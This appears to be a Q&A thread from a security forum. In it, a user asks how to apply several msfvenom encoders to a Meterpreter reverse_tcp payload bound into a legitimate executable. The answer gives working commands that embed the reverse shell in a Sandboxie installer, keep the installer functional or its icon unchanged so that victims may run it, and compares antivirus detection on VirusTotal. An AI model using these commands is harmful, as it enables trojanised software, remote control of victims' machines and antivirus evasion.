6

I am trying multiple encode on same the executable file, but confused with the syntax.

The Problem:

To encode any executable file we can use the syntax:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=XXX.XXX.XX.X
LPORT=XXXX -x /location/of/thefile/filename.exe -k -e x86/shikata_ga_nai -i 10 -f exe > encoded.exe

Now, I want to encode some other executable file/same file; multiple time using different encoders.
Syntax which I am using :

msfvenom -p windows/meterpreter/reverse_tcp LHOST=XXX.XXX.XX.X LPORT=XX -x  /location/of/thefile/filename.exe -k -e x86/shikata_ga_nai -i 10 -f raw | msfvenom -a x86 --platform windows -e x86/countdown -i 8 -f raw | msfvenom -a x86 --platform windows -e x86/bloxor -i 9 -f exe -o multiencoded.exe

I found this thread then implemented the above syntax. But the output file it is generating does not have the included executable file. As size of output from first syntax is 19MB and from second syntax it is 76kB.

So, my question is how can I implement multiple encode to the same executable file.

neferpitou
  • 281
  • 1
  • 3
  • 8
  • HD Moore, developer of MSF answers this in on the bottom of this page https://community.rapid7.com/thread/7668 – J.A.K. Mar 18 '17 at 17:26
  • 1
    I read the same thread and l have linked it in the question also but it tells how to encode payload multiple time. But here I am combining a payload to a executable file and then trying to encode it multiple time with different encoder. – neferpitou Mar 18 '17 at 17:42
  • You're right, i read that too quickly. Try looking at the output of each encoding before piping it to the next encoder to see in what stage it gets smaller. Keep in mind tho, that encoding multiple times will not improve evasion that much. It's as suspicious as the *last* encoder because of the decoding stub. It might make static analysis harder, but all anyone has to do is run it to dump the contents. – J.A.K. Mar 18 '17 at 21:21
  • 1
    Yes, I know it won't change the evasion too much. I was just curious about it. Will update the post soon. – neferpitou Mar 19 '17 at 01:02

1 Answers1

4

As we know encoding does not help too much in evading AV but I got some interesting result after trying few things and if we know the AV name on the victim machine we can try our luck with this method.

Method one :

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.163 LPORT=12345 -x /root/Downloads/SandboxieInstall.exe -k -e x86/shikata_ga_nai -i 10 -f exe > encodedsandbox.exe

I used Sandboxie for this method and it converted 9MB file to 17.9MB file. Then uploaded it on VirusTotal. enter image description here

From the screenshot you can see AV like Avast, eScan, ESET were able to scan it as a trojan. However, only few AV did not detect it as shown below.

enter image description here

Now comes the second method which I asked in the question i.e "Encode an executable file multiple time using MSF venom".Finally, I was able to implement it and found more exciting result. 

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.163 LPORT=12345 -e x86/shikata_ga_nai -i 10 -f raw > eoncode.bin

msfvenom -p - -x /root/Downloads/SandboxieInstall.exe -k -f exe -a x86 --platform windows -e x86/bloxor -i 2 > sanbox.exe < eoncode.bin

The syntax is a bit different from what I mentioned above in the question but it worked. The final file which it generated was of 17.9MB only same as the previous file. The new file generated will act as same as original software due to "-k" flag and result from VirusTotal was same as previous but I was successful in what I was trying to implement.

If we remove "-k" flag from the last syntax it will generate the exe file of 9MB and icon will be same as original software i.e Sandboxie but it will loose it's original functionality (after opening the file nothing will happen as we removed "-k" flag,since it has same size as original file ps icon also looks the same people may run it). But when I uploaded it on VirusTotal found some interesting result as shown below. enter image description here

Which is just opposite of above result.

neferpitou
  • 281
  • 1
  • 3
  • 8